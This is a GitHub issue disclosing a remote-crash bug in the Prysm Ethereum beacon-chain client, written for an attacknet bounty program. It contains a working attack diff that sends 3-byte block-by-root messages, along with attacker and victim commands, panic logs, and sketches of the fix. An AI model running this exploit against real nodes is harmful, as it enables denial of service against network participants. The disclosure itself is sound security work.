[prysm-attack-0 Reward] Remote crash nodes over p2p

holiman commented 4 years ago

Description

There is (was) a bug in Prysm that made it possible for an attacker to crash arbitrary remote nodes via the p2p protocol.

Attack scenario

The prysm ssz decoder assumed a minimum input size on block root messages, so a malformed (too short) message caused a panic. It turns out that this message can be sent very early in a connection, and can shut down any node we discover and connect to.

Impact

This attack could be used to shut down all prysm-based nodes on the network. It was not executed on the live network, but instead disclosed privately to @prestonvanloon and @djrtwo , and fixed in https://github.com/prysmaticlabs/prysm/pull/6771 .

Details

There's a quirk in the prysm/beacon-chain ssz decoder (beacon-chain/p2p/encoder/ssz.go):

func (e SszNetworkEncoder) doDecode(b []byte, to interface{}) error {
    if v, ok := to.(fastssz.Unmarshaler); ok {
        return v.UnmarshalSSZ(b)
    }
    err := ssz.Unmarshal(b, to)
    if err != nil {
        // Check if we are unmarshalling block roots
        // and then lop off the 4 byte offset and try
        // unmarshalling again. This is temporary to
        // avoid too much disruption to onyx nodes.
        // TODO(#6408)
        if _, ok := to.(*[][32]byte); ok {
            return ssz.Unmarshal(b[4:], to)
        }

If it reaches this path, expecting to parse a block root message, it blindly assumes that the input is at least 4 bytes.
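To make the failure mode concrete, here is a minimal standalone sketch of the same slicing pattern next to a length-checked variant. The helper names (`stripOffsetUnsafe`, `stripOffsetChecked`, `errTooShort`, `panics`) are made up for illustration and are not Prysm identifiers, and the checked variant is not necessarily how the actual fix was written.

```go
package main

import (
	"errors"
	"fmt"
)

// errTooShort is a hypothetical error used only in this sketch.
var errTooShort = errors.New("input shorter than the 4 byte offset")

// stripOffsetUnsafe mirrors the b[4:] expression from the excerpt:
// it panics whenever len(b) < 4.
func stripOffsetUnsafe(b []byte) []byte {
	return b[4:]
}

// stripOffsetChecked validates the length before slicing and
// returns an error instead of panicking.
func stripOffsetChecked(b []byte) ([]byte, error) {
	if len(b) < 4 {
		return nil, errTooShort
	}
	return b[4:], nil
}

// panics reports whether calling f results in a panic.
func panics(f func()) (p bool) {
	defer func() {
		if r := recover(); r != nil {
			p = true
		}
	}()
	f()
	return false
}

func main() {
	short := make([]byte, 3) // same length as the attack payload

	fmt.Println("unsafe panics:", panics(func() { stripOffsetUnsafe(short) }))

	_, err := stripOffsetChecked(short)
	fmt.Println("checked error:", err)
}
```

With a 3-byte input the unchecked version hits a slice bounds panic, while the checked version hands an ordinary error back to the caller.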

The diff below represents a very naive attack which sends such a message at the first possible time: instead of sending whatever message the node wanted to send, it sends a too-short message, with a topic that should trigger the dangerous path.

Here's the attack code:

diff --git a/beacon-chain/p2p/encoder/ssz.go b/beacon-chain/p2p/encoder/ssz.go
index 001ff674f..8b8e4758c 100644
--- a/beacon-chain/p2p/encoder/ssz.go
+++ b/beacon-chain/p2p/encoder/ssz.go
@@ -75,9 +75,11 @@ func (e SszNetworkEncoder) EncodeWithMaxLength(w io.Writer, msg interface{}) (in
    if err != nil {
        return 0, err
    }
+   b = make([]byte, 3)
    return writeSnappyBuffer(w, b)
 }

+
 func (e SszNetworkEncoder) doDecode(b []byte, to interface{}) error {
    if v, ok := to.(fastssz.Unmarshaler); ok {
        return v.UnmarshalSSZ(b)
@@ -89,6 +91,7 @@ func (e SszNetworkEncoder) doDecode(b []byte, to interface{}) error {
        // unmarshalling again. This is temporary to
        // avoid too much disruption to onyx nodes.
        // TODO(#6408)
+       fmt.Printf("SszNetworkEncoder decoding dangerously, size %d\n", len(b))
        if _, ok := to.(*[][32]byte); ok {
            return ssz.Unmarshal(b[4:], to)
        }
diff --git a/beacon-chain/p2p/sender.go b/beacon-chain/p2p/sender.go
index dd9d8fb3b..93bf9378d 100644
--- a/beacon-chain/p2p/sender.go
+++ b/beacon-chain/p2p/sender.go
@@ -2,6 +2,7 @@ package p2p

 import (
    "context"
+   "fmt"

    "github.com/libp2p/go-libp2p-core/network"
    "github.com/libp2p/go-libp2p-core/peer"
@@ -18,9 +19,13 @@ func (s *Service) Send(ctx context.Context, message interface{}, baseTopic strin
    if err := VerifyTopicMapping(baseTopic, message); err != nil {
        return nil, err
    }
+   // Never mind what we wanted to send, just ship the attack instead
+   baseTopic = RPCBlocksByRootTopic
+
    topic := baseTopic + s.Encoding().ProtocolSuffix()
    span.AddAttributes(trace.StringAttribute("topic", topic))

+
    // Apply max dial timeout when opening a new stream.
    ctx, cancel := context.WithTimeout(ctx, maxDialTimeout)
    defer cancel()
@@ -35,6 +40,10 @@ func (s *Service) Send(ctx context.Context, message interface{}, baseTopic strin
        return stream, nil
    }

+   if baseTopic == RPCBlocksByRootTopic{
+       fmt.Printf("oh cool, we're sending blockbyroot topic to %v\n", pid.Pretty())
+   }
+
    if _, err := s.Encoding().EncodeWithMaxLength(stream, message); err != nil {
        traceutil.AnnotateError(span, err)
        return nil, err

Startup script for the attacker (using the modified code):

~/go/src/github.com/prysmaticlabs/prysm/beacon-chain/beacon-chain --config-file prysm_config.yaml --datadir .   \
--peer /ip4/10.137.0.15/tcp/13000/p2p/16Uiu2HAmA7m8JWJR1zgMLwjUv9WaEFsRnrVgnwf22t72FEhgGtws \
--bootstrap-node="enr:-LK4QFbGwVUubLp8SsbBsakUqhVeNihazNXPJQ1DZMkRVB8yZOEkzfRoCVCi545L27XzPzvF09NO0Ie56isjSAZAf9cBh2F0dG5ldHOIAAAAAAAAAACEZXRoMpCmW0iXAAAAAP>
--p2p-udp-port 12001 --p2p-tcp-port 12002

Startup script for the victim (using master code):

./beacon-chain --config-file prysm_config.yaml --datadir . \
--verbosity debug

The victim is started first, and goes through some deposit contract events. Then I start the attacker, and see this in the victim output:

[2020-07-29 22:34:23]  INFO p2p: Peer connected activePeers=3 direction=Outbound multiAddr=/ip4/98.238.148.22/tcp/13000/p2p/16Uiu2HAm8JguF9aEQ5SJene8cbcAoQKzKviocYmv8hEXz9v7mZLF
[2020-07-29 22:34:24] DEBUG initial-sync: Requesting blocks capacity=576 count=64 peer=16Uiu2HAmCorr1KscykspjPJvUxrFnop1ov4SDxMtfFy4VW4RFxPH start=10688 step=1
[2020-07-29 22:34:24] DEBUG initial-sync: Requesting blocks capacity=576 count=64 peer=16Uiu2HAm8JguF9aEQ5SJene8cbcAoQKzKviocYmv8hEXz9v7mZLF start=10240 step=1
[2020-07-29 22:34:24] DEBUG initial-sync: Requesting blocks capacity=576 count=64 peer=16Uiu2HAmRvAS3qnU29V2FUeWquJgnEJ8CRrwRcnpjHPZfsUrNTzR start=10304 step=1
[2020-07-29 22:34:24] DEBUG initial-sync: Requesting blocks capacity=512 count=64 peer=16Uiu2HAm8JguF9aEQ5SJene8cbcAoQKzKviocYmv8hEXz9v7mZLF start=10368 step=1
[2020-07-29 22:34:24] DEBUG initial-sync: Requesting blocks capacity=512 count=64 peer=16Uiu2HAmCorr1KscykspjPJvUxrFnop1ov4SDxMtfFy4VW4RFxPH start=10432 step=1
[2020-07-29 22:34:24] DEBUG initial-sync: Requesting blocks capacity=512 count=64 peer=16Uiu2HAmRvAS3qnU29V2FUeWquJgnEJ8CRrwRcnpjHPZfsUrNTzR start=10496 step=1
[2020-07-29 22:34:24] DEBUG initial-sync: Requesting blocks capacity=448 count=64 peer=16Uiu2HAm8JguF9aEQ5SJene8cbcAoQKzKviocYmv8hEXz9v7mZLF start=10560 step=1
[2020-07-29 22:34:24] DEBUG initial-sync: Requesting blocks capacity=448 count=64 peer=16Uiu2HAmCorr1KscykspjPJvUxrFnop1ov4SDxMtfFy4VW4RFxPH start=10624 step=1
panic: runtime error: slice bounds out of range [4:3]

goroutine 1127 [running]:
github.com/prysmaticlabs/prysm/beacon-chain/p2p/encoder.SszNetworkEncoder.doDecode(0xc00c54a000, 0x3, 0x82, 0x159b720, 0xc00f47e460, 0x0, 0x0)
    /home/user/go/src/github.com/prysmaticlabs/prysm/beacon-chain/p2p/encoder/ssz.go:93 +0x19c
github.com/prysmaticlabs/prysm/beacon-chain/p2p/encoder.SszNetworkEncoder.DecodeWithMaxLength(0x735afc201458, 0xc00f47e3e0, 0x159b720, 0xc00f47e460, 0x0, 0x0)
    /home/user/go/src/github.com/prysmaticlabs/prysm/beacon-chain/p2p/encoder/ssz.go:134 +0x1c6
github.com/prysmaticlabs/prysm/beacon-chain/sync.(*Service).registerRPC.func1(0x1cf1c20, 0xc00f47e3e0)
    /home/user/go/src/github.com/prysmaticlabs/prysm/beacon-chain/sync/rpc.go:133 +0x12a8
github.com/libp2p/go-libp2p/p2p/host/basic.(*BasicHost).SetStreamHandler.func1(0xc00d24ec40, 0x39, 0x735aee2f2588, 0xc00f47e3e0, 0x1, 0x0)
    /home/user/go/pkg/mod/github.com/libp2p/go-libp2p@v0.9.2/p2p/host/basic/basic_host.go:486 +0x9d
created by github.com/libp2p/go-libp2p/p2p/host/basic.(*BasicHost).newStreamHandler
    /home/user/go/pkg/mod/github.com/libp2p/go-libp2p@v0.9.2/p2p/host/basic/basic_host.go:337 +0x63c
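
The trace shows the panic happening inside a goroutine spawned for the incoming stream. In Go, an unrecovered panic in any goroutine terminates the whole process, which is why one bad message takes the node down. As a defense-in-depth sketch (not a description of what Prysm or libp2p actually do), a stream handler could be wrapped so that a panic is converted into an error. The `handler` type, `withRecover` and `decodeRoots` below are hypothetical names for illustration only.

```go
package main

import (
	"errors"
	"fmt"
	"sync"
)

// handler stands in for a per-stream RPC handler.
// The name and signature are assumptions for this sketch.
type handler func(payload []byte) error

// withRecover wraps h so that a panic inside it is turned into
// an error instead of terminating the process.
func withRecover(h handler) handler {
	return func(payload []byte) (err error) {
		defer func() {
			if r := recover(); r != nil {
				err = fmt.Errorf("handler panicked: %v", r)
			}
		}()
		return h(payload)
	}
}

// decodeRoots imitates the unchecked b[4:] slice from the decoder,
// followed by a simple check that the rest is a list of 32-byte roots.
func decodeRoots(payload []byte) error {
	rest := payload[4:] // panics if len(payload) < 4
	if len(rest)%32 != 0 {
		return errors.New("roots payload is not a multiple of 32 bytes")
	}
	return nil
}

func main() {
	safe := withRecover(decodeRoots)

	var wg sync.WaitGroup
	wg.Add(1)
	go func() { // one goroutine per stream, as in the trace
		defer wg.Done()
		fmt.Println("handler result:", safe(make([]byte, 3)))
	}()
	wg.Wait()

	fmt.Println("process still running")
}
```

A wrapper like this only limits the blast radius; the length check in the decoder is still the real fix.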

This is the output for the attacker:

[2020-07-29 22:34:25]  INFO p2p: Node started p2p server multiAddr=/ip4/10.137.0.15/tcp/12002/p2p/16Uiu2HAmMUrPwkC1RgFKyuQD2y3SNLEnffsUeUPZ2TCCVazbzBRG
oh cool, we're sending blockbyroot topic to 16Uiu2HAmA7m8JWJR1zgMLwjUv9WaEFsRnrVgnwf22t72FEhgGtws
[2020-07-29 22:34:25]  INFO p2p: Peer connected activePeers=1 direction=Outbound multiAddr=/ip4/10.137.0.15/tcp/13000/p2p/16Uiu2HAmA7m8JWJR1zgMLwjUv9WaEFsRnrVgnwf22t72FEhgGtws
[2020-07-29 22:34:25]  INFO p2p: Peer disconnected activePeers=0 multiAddr=/ip4/10.137.0.15/tcp/13000/p2p/16Uiu2HAmA7m8JWJR1zgMLwjUv9WaEFsRnrVgnwf22t72FEhgGtws
[2020-07-29 22:34:26]  INFO powchain: Connected to eth1 proof-of-work chain endpoint=https://goerli.prylabs.net
[2020-07-29 22:34:30]  INFO initial-sync: Waiting for enough suitable peers before syncing required=3 suitable=0

It connected, and immediately put the victim to sleep.

djrtwo commented 4 years ago

Fantastic find @holiman! Welcome to the party :) This qualifies for a $5k beta-0 attacknet bounty reward. I'll circle back next week to get you on the (soon to be) leaderboard and reach out for payment.

Thank you @prestonvanloon for the quick and discreet fix.

holiman commented 4 years ago

Thanks!

However, I don't think it would be right for me to accept a bounty, since my job is ethereum security, which does not exclude eth2. Keep the money for future bug hunters :)
